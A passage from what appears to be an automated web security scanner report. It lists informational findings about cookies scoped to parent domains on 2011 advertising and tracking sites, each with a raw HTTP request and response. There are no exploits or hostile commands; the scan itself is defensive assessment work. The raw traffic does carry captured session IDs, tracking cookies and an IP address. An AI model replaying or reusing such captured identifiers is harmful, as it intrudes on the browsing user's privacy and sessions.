Set-Cookie: app-instance=mtv-com-1-mtv-jboss-030; Path=/
Set-Cookie: MTV_ID=209.18.38.157.1308010817621; Domain=.mtv.com; Expires=Fri, 11-Jun-2021 00:20:17 GMT; Path=/
Set-Cookie: JSESSIONID=D48ED7EDF023D65652E97D5F0EF7CFA9.mtv-jboss-029-811-mtvi-com-34851; Path=/
MTVi-Edge-control: bust-downstream
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:03 GMT


11.21. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07608 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; rtc_AVou=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; 
rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:54 GMT; Path=/
Last-Modified: Tue, 14 Jun 2011 00:13:54 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 14 Jun 2011 01:13:54 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 6038

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07608';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

11.22. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=wsj_snippet_cs=1&betq=4544=381370 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; BASE=x7Q9Oi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0ibEOliUSEDbOxB!; ROLL=U6APCjO!; F1=BoSNk3kAAAAAnXzCAIAAgEA; C2=PAM7NFJwFsb0FCaqHLQCiZMSi+iAezihYtphC88BGe4sWJwYkaUbDqsAZPVxHOLiIcCqGAXrKLwJ3ZYbtKPCC0nBwxa8CwwcGbokCfASbXUqH0t1Fl6BLGeRpeAPaaUqHEb4Fl6BA9qRpeAZhXUqHskmGl6BBGeRpeA2kXUqHoLOGl6BYGeRpeAghXUqH0NYGl6B8LrRpeAUlZUqHgJaGl6BcbpRpeAhhXUqHUY4Fl6BEHoRpeQVrZUqHsN5Fl6BBHoRpegdeZUqHYZgGl6BC9qRpegCaaUqHEbmGl6BFBqRpeQziaUqHwbmGlKseKw7RaM3RGgAg2cBdHm5IaQa0KnAbzqxc3I9DsfzFETroNAPDa8xum/AHrpxHXAhTaIp2iLBqirxcPrZFMKpGS6sQVwSkaIplWsAT3jBo/KEHcHiGkG; GUID=MTMwNzM2MTI5NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:14:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=Nfq9NFJwIob0FAXqHDQCiZ8Ki+CAezih7sphA88BGq2sWBwYkaEUDqMAZPVxqNLiGcCqGMVrKDwJ3ZIUtKvBC0nBTxa8AwwcGnmkCXASbXEjF0t1FxYBLGeRMWAPaaEjFEb4FxYBA9qRMWAZhXEjFskmGxYBBGeRMWA2kXEjFoLOGxYBYGeRMWAghXEjF0NYGxYB8LrRMWAUlZEjFgJaGxYBcbpRMWAhhXEjFUY4FxYBEHoRMWQVrZEjFsN5FxYBBHoRMWgdeZEjFYZgGxYBC9qRMWgCaaEjFEbmGxYBFBqRMWQziaEjFwbmGxIseCw7Ra8vRGAAg2cBA/l5IaAT0KHAbzqx/2I9BsfzFQRroFAPDasqumfAHrpxqOAhTa4h2irAqirx/OrZDMKpGe4sQNwSka4hlWMAT3jBL/KEFcHiGwE; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: GUID=MTMwODAxMDQ0NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 14 Jun 2011 01:14:05 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.23. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /adui/signin/displaySignin.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adui/signin/displaySignin.do HTTP/1.1
Host: marketingsolutions.login.yahoo.com
Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: JSESSIONID=C08D800A7F9FFF726A8F260F8117457E.; Path=/adui; Secure
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ALP=bTowJmw6ZW5fVVMm; Domain=.yahoo.com; Expires=Wed, 13-Jun-2012 06:10:31 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34149

<html lang="en"><head>
<script type="text/javascript">
if (top != self) top.location.href = location.href;

document.domain = "login.yahoo.com";
</script>

<title>
Sponsored Search Lo
...[SNIP]...

11.24. http://p.opt.fimserve.com/bht/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bht/?r=p&px=363&v=1&rnd=58424677746370430 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/resources/documents/PixelTracking.html?site=interactive.wsj.com&zone=tech_front&pageId=0_0_WP_2200&cb=883697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJE3NYfulixdXdQajAg==; UI=2b0be1156db673a127|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; ssrtb=0; LO=00Mn6F5rm1O00Kf500g0QhoGO4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: LO=00MB6D8xm1O00Of500o0StcXwI; Domain=.opt.fimserve.com; Expires=Tue, 13-Sep-2011 00:13:57 GMT; Path=/
ETag: W/"43-1160088754000"
Last-Modified: Thu, 05 Oct 2006 22:52:34 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 14 Jun 2011 00:13:56 GMT

GIF89a.............!.......,...........L..;

11.25. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D2011051519270862126421219180%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; rtc_AVou=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; rsiPus_NgLQ="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"; 
rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:56 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:56 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:55 GMT
Content-Length: 743

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['D08734_72092','D08734_72131','D08734_72639','D08734_72674','D08734_72685','D08734_72764','D08734_72782','D08734_72765','D08734_72132'
...[SNIP]...

11.26. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G07608/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G07608/a4/0/0/pcx.js?csid=G07608 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; 

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:55 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 941

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
var rsinetsegs=['G07608_10004','G07608_10009','G07608_10016','G07608_10017','G07608_10001'];
var rsicsl="lDlIlPlQlA";
var rsiExp=new Date((new Date(
...[SNIP]...

11.27. http://px.owneriq.net/ep

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /ep

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ep?sid%5B%5D=133789898&sid%5B%5D=133443903&sid%5B%5D=133663613&rid%5B%5D=1203653&rid%5B%5D=1203654&rid%5B%5D=1203953 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: si=3589157951140485318; gguuid=CAESECRt4BlvfnFjSL7l7K77jrU; oxuuid=7bbcd01e-f726-4eb0-8371-0cfa1038e6ef; ss=uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.uxrmm.nqhjy.12sfsa.12sizu.uxrmr.njtv7.12sfsf.12sizz; apq=.; rpq=.

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
Content-Length: 153
Content-Type: text/html
Location: http://ib.adnxs.com/pxj?bidder=13&seg=49740&action=as(133789898);as(133443903);as(133663613);&redir=http%3a%2f%2fad.yieldmanager.com%2fpixel%3fadv%3d95413%26t%3d2%26id%3d1203653%26id%3d1203654%26id%3d1203953
Set-Cookie: ss=27g5z3.uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.27kvi5.uxrmm.nqhjy.12sfsa.12sizu.27nky2.uxrmr.njtv7.12sfsf.12sizz; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Cache-Control: max-age=20498
Date: Tue, 14 Jun 2011 12:02:41 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

11.28. http://stgapi.choicestream.com/instr/csanywhere.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stgapi.choicestream.com
Path:   /instr/csanywhere.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/csanywhere.js HTTP/1.1
Host: stgapi.choicestream.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 416b7a85-3459-413f-9abb-9ac5225a9955
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
ETag: W/"84353-1300364150000"
Last-Modified: Thu, 17 Mar 2011 12:15:50 GMT
Content-Type: text/javascript
ntCoent-Length: 84353
Cache-Control: private
Content-Length: 84353
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 17:45:46 GMT
Connection: close
Set-Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6; Domain=.choicestream.com; Expires=Tue, 12-Jun-2012 17:45:46 GMT; Path=/

/*
* Copyright (c) 2000-2011 ChoiceStream, Inc. All Rights Reserved
*/
(function(){if(window.jQuery){var _jQuery=window.jQuery}var jQuery=window.jQuery=function(selector,context){return new jQuery.
...[SNIP]...

11.29. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s21898508197627

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

